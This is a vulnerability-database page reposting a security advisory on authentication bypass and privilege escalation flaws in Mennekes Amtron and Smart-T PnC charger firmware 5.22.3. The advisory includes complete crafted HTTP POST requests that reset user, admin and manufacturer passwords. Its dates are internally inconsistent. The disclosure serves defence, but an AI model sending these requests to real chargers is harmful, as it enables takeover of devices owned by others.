Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

📄 Mennekes Amtron Series and Smart-T PnC 5.22.3 Authentication Bypass / Privilege Escalation

🗓️ 01 Jun 2026 00:00:00Reported by S. Eisenreich-Dietz, T. WeberType 
packetstorm
 packetstorm🔗 packetstorm.news👁 50 Views

Mennekes Amtron and Smart-T PnC: authentication bypass and privilege escalation in v5.22.3; fixed in v5.33.11-21500.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB		CVE-2026-8979
28 May 202613:05
attackerkb
ATTACKERKB		CVE-2026-8980
28 May 202613:12
attackerkb
Circl		CVE-2026-8979
28 May 202615:43
circl
Circl		CVE-2026-8980
28 May 202615:53
circl
CNNVD		MENNEKES AMTRON 安全漏洞
28 May 202600:00
cnnvd
CNNVD		MENNEKES AMTRON 安全漏洞
28 May 202600:00
cnnvd
CVE		CVE-2026-8979
28 May 202613:05
cve
CVE		CVE-2026-8980
28 May 202613:12
cve
Cvelist		CVE-2026-8979 Authentication Bypass
28 May 202613:05
cvelist
Cvelist		CVE-2026-8980 Privilege Escalation
28 May 202613:12
cvelist
Rows per page
CyberDanube Security Research 20260528-0
    -------------------------------------------------------------------------------
                    title| Multiple Vulnerabilities
                  product| Mennekes Amtron Series and Smart-T PnC
       vulnerable version| 5.22.3
            fixed version| 5.33.11-21500
               CVE number| CVE-2026-8979, CVE-2026-8980
                   impact| High
                 homepage| https://www.mennekes.at/
                    found| 2025-11-27
                       by| S. Eisenreich-Dietz, T. Weber
                         | CyberDanube Security Research
                         | Austria - Vienna
                         | https://www.cyberdanube.com
    -------------------------------------------------------------------------------
    
    Vendor description
    -------------------------------------------------------------------------------
    For more than 80 years, MENNEKES has stood for quality electrical products and
    service throughout the world. When it comes to solutions that handle current
    intelligently and safely, we set the standard for innovation, quality,
    manufacturing and development.
    
    Source: https://www.mennekes.com/about/about-us
    
    
    Vulnerable Products
    -------------------------------------------------------------------------------
    Amtron Professional
    Amtron Professional (Eichrecht)
    Amedio Professional
    Amtron Charge Control
    Amtron Professional Twincharge
    Smart-T PnC
    
    Vulnerability Overview
    -------------------------------------------------------------------------------
    1) Authentication Bypass (CVE-2026-8979)
    An unauthentication attacker can use a crafted POST request to change the
    password of the user account.
    
    2) Privilege Escalation (CVE-2026-8980)
    An authenticated attacker can use a crafted POST request to change the password
    of the manufacturer and admin account as low privileged user.
    
    
    Proof of Concept
    -------------------------------------------------------------------------------
    1) Authentication Bypass (CVE-2026-8979)
    The following POST request can be used to change the password of the user
    account to "asdf"
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    POST /operator/operator HTTP/1.1
    Host: 10.201.74.66
    Accept-Language: en-US,en;q=0.9
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/133.0.0.0 Safari/537.36
    Accept:
    text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,imag
    e/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 24
    UserPwdPlain_custom=asdf
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    
    2) Privilege Escalation (CVE-2026-8980)
    The following POST requests can be used to change the admin (operator) and
    manufacturer account password to "asdf".
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    POST /json/settings.json HTTP/1.1
    Host: 10.201.74.66
    Content-Length: 60
    Authorization: e81179e1-5e50-45d4-8ee6-27161dcf69d8
    Accept-Language: en-US,en;q=0.9
    Accept: application/json, text/plain, */*
    Content-Type: application/json;charset=UTF-8
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/133.0.0.0 Safari/537.36
    Origin: http://10.201.74.66
    Referer: http://10.201.74.66/groups/system
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    {"params":[{"key":"OperatorPwdPlain_custom","value":"asd"}]}
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    POST /json/settings.json HTTP/1.1
    Host: 10.201.74.66
    Content-Length: 59
    Authorization: 526ee807-4295-46f3-a9e4-0f4bcac97af9
    Accept-Language: en-US,en;q=0.9
    Accept: application/json, text/plain, */*
    Content-Type: application/json;charset=UTF-8
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
    Gecko) Chrome/133.0.0.0 Safari/537.36
    Origin: http://10.201.74.66
    Referer: http://10.201.74.66/groups/system
    Accept-Encoding: gzip, deflate, br
    Connection: keep-alive
    {"params":[{"key":"ManufacturerPwd_custom","value":"asd"}]}
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    
    Solution
    -------------------------------------------------------------------------------
    Update to the newest Firmware.
    
    
    Workaround
    -------------------------------------------------------------------------------
    Restrict access to the device.
    
    
    Contact Timeline
    -------------------------------------------------------------------------------
    2025-02-24: Get in contact with [email protected]
    2025-02-25: Vulnerabilities get acknowledged and are forwarded to BENDER
                    as they are the manufacturer for the devices.
    2025-03-18: Ask for update regarding fixes, CVE numbers, fixed version and
                    effected products. Response states that they will not create
                    CVEs.
    2025-05-28: Release of advisory.    
    
    Web: https://www.cyberdanube.com
    Twitter: https://twitter.com/cyberdanube
    Mail: research at cyberdanube dot com
    
    EOF S. Eisenreich-Dietz / @2026

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jun 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 410
EPSS0.00612
SSVC
authentication bypassprivilege escalationmennekes amtronsmart-t pncv5.22.3v5.33.11-21500
50